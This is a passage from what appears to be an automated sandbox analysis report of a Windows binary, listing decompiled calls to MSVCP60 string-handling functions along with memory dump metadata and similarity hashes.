                                              • Part of subcall function 013C2795: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,013C35AE,?,?,?,?,?,?,?,013B969A,?,?), ref: 013C27A4
                                              • Part of subcall function 013C2795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,013C35AE,?,?,?,?,?,?,?,013B969A,?,?), ref: 013C27AE
                                              • Part of subcall function 013C2795: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,013C35AE,?,?,?,?,?,?,?,013B969A,?,?), ref: 013C27B7
                                              • Part of subcall function 013C2795: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,013C35AE,?,?,?,?,?,?,?,013B969A,?,?), ref: 013C27C1
                                              • Part of subcall function 013C2795: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,013C35AE,?,?,?,?,?,?,?,013B969A,?,?), ref: 013C27CB
                                              • Part of subcall function 013C2795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,013C35AE,?,?,?,?,?,?,?,013B969A,?), ref: 013C27E1
                                              • Part of subcall function 013C2795: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,013C35AE,?,?,?,?,?,?,?,013B969A,?,?), ref: 013C27EA
                                            • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,013B969A,?,?), ref: 013C35B2
                                              • Part of subcall function 013C35DE: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 013C35EE
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,013B969A,?,?), ref: 013C35CA
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,013B969A,?,?), ref: 013C35D3
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$D@2@@std@@D@std@@$??0?$basic_string@$??1?$basic_string@$?begin@?$basic_string@G@1@@$?c_str@?$basic_string@?end@?$basic_string@?length@?$basic_string@D@1@@V01@@
                                            • String ID:
                                            • API String ID: 384503197-0
                                            • Opcode ID: 31ea3dafd94be987208df64e5da62bba2830e6b785f6304143d69d4c8e303cbc
                                            • Instruction ID: e1d4e1b6a3a420c3e963b9e75c99961034148ff37861d5b50be4c0db9d950219
                                            • Opcode Fuzzy Hash: 31ea3dafd94be987208df64e5da62bba2830e6b785f6304143d69d4c8e303cbc
                                            • Instruction Fuzzy Hash: B3F0B77150021EAFCF14EFA4EC48CEE7B7CBB18314F444419F91292090EB71B9598B90
                                            Uniqueness

                                            Uniqueness Score: -1.00%